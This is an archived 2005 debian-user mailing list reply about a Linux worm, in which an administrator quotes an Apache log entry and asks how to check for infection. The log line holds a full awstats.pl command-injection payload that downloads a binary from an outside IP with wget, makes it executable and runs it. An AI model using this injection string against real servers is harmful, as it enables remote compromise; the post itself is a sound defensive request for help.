Re: New Linux worm crawls the web

To: debian-user@lists.debian.org
Subject: Re: New Linux worm crawls the web
From: "[KS]" <lists04@fastmail.fm>
Date: Wed, 09 Nov 2005 10:10:50 -0500
Message-id: <[🔎] 4372117A.1070909@fastmail.fm>
In-reply-to: <[🔎] dkr2f8$52m$1@sea.gmane.org>
References: <[🔎] 4370EEFE.5070504@sbcglobal.net> <[🔎] dkr2f8$52m$1@sea.gmane.org>

Hugo Vanwoerkom wrote:
> Mike McCarty wrote:
> 
>> http://www.securityfocus.com/brief/38?ref=rss
>>
>>
> 
> How to detect whether infection has occurred?
> 
> H
> 
> 

I got the following log in my apache access.log which I'm concerned about:

208.234.0.44 - - [08/Nov/2005:10:01:03 -0500] "GET
/cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
  HTTP/1.1" 200 780 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"

This was the only log which gave the client a 200 reply. I didn't find
anything on my /tmp and nothing was listening to the UDP ports 7111 or
7222. My awstats version is 6.4-2 which people say should be patched up
to be unvulnerable to this attack.

How do I make sure that my machine is not infected and serving someone
else now?

Thanks,
/KS

Reply to:

References:
- New Linux worm crawls the web
  - From: Mike McCarty <mike.mccarty@sbcglobal.net>
- Re: New Linux worm crawls the web
  - From: Hugo Vanwoerkom <hvw59601@care2.com>

Prev by Date: Re: OpenOffice 2 on Sarge?
Next by Date: apt.conf question
Previous by thread: Re: New Linux worm crawls the web
Next by thread: Re: New Linux worm crawls the web
Index(es):
- Date
- Thread